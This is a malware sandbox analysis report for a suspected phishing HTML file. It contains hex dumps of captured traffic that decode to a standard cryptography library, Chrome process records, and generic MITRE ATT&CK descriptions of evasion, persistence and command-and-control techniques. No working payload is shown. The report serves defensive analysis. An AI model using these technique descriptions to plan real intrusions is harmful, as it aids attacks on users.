6e 28 68 29 7b Data Ascii: 7bf1!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U\|\|function(h){
2025-03-24 22:03:07 UTC	1369	IN	Data Raw: 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 Data Ascii: of globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.cr
2025-03-24 22:03:07 UTC	1369	IN	Data Raw: 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 Data Ascii: .call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomByte
2025-03-24 22:03:07 UTC	1369	IN	Data Raw: 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c Data Ascii: ypeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4o),c=(s=t?h.ceil(s):h.max((0\|s)-this._minBufferSize,0))o,n=h.min(4*c,n);if(c){for(var a=0;a<
2025-03-24 22:03:07 UTC	1369	IN	Data Raw: 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e Data Ascii: (var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b\|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)\|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)\|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)\|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>
2025-03-24 22:03:07 UTC	1369	IN	Data Raw: 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b Data Ascii: ;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((nn>>>17)+no>>>15)+oo^((4294901760&i)i\|0)+((65535&i)*i\|0)}t[0]=I[0]+(I[7]<<16\|I[7]>>>16)+(I[6]<<16\|I[6]>>>16)\|0,t[1]=I[1]+(I[0]<<8\|I[0]>>>24)+I[7]\|0,t[2]=I[2]+(I[1]<<16\|I[1]>>>16)+(I[0]<<16\|I[
2025-03-24 22:03:07 UTC	1369	IN	Data Raw: 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a Data Ascii: er,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]\|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:
2025-03-24 22:03:07 UTC	1369	IN	Data Raw: 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f Data Ascii: charAt(64);return!o\|\|-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%42,c=r[t.charCodeAt(o)]>>>6-o%42,c=s\|c,i[n>>>2]\|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNO
2025-03-24 22:03:07 UTC	1369	IN	Data Raw: 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 Data Ascii: (a.sin(t+1))\|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8\|n>>>24)\|4278255360&(n<<24\|n>>>8)}var o=th
2025-03-24 22:03:07 UTC	1369	IN	Data Raw: 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c Data Ascii: ]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,

Statistics

CPU Usage

• chrome.exe
• chrome.exe
• chrome.exe

Click to jump to process

Memory Usage

• chrome.exe
• chrome.exe
• chrome.exe

Click to jump to process

Click to jump to process

System Behavior

Analysis Process: chrome.exePID: 3432, Parent PID: 3032

Function Logs

General

Target ID:	2
Start time:	18:02:55
Start date:	24/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff786830000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

File Activities

File Opened

Show Windows behavior

Registry Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

COM Activities

WMI Operations

Show Windows behavior

Process Activities

Process Created

Process Terminated

Show Windows behavior

Thread Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Memory Activities

Memory Usage Statistics

Show Windows behavior

Timing Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Windows UI Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Process Token Activities

Token Adjusted

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 1236, Parent PID: 3432

Function Logs

General

Target ID:	4
Start time:	18:02:56
Start date:	24/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2368,i,5159798735174647270,7677478092604775120,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2396 /prefetch:3
Imagebase:	0x7ff786830000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

File Activities

File Opened

Show Windows behavior

Thread Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Memory Activities

Memory Usage Statistics

Show Windows behavior

Timing Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 7084, Parent PID: 3032

Function Logs

General

Target ID:	9
Start time:	18:03:03
Start date:	24/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\Play_Audio.#Anina.html"
Imagebase:	0x7ff786830000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

File Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Process Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Play_Audio.#Anina.html

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Malware Analysis System Evasion

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 57

Chrome Cache Entry: 58

Chrome Cache Entry: 59

Static File Info

General

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 3432, Parent PID: 3032

General

File Activities

File Opened

File Created

File Deleted

File Moved

Other File Operations

Registry Activities

Windows Analysis Report
Play_Audio.#Anina.html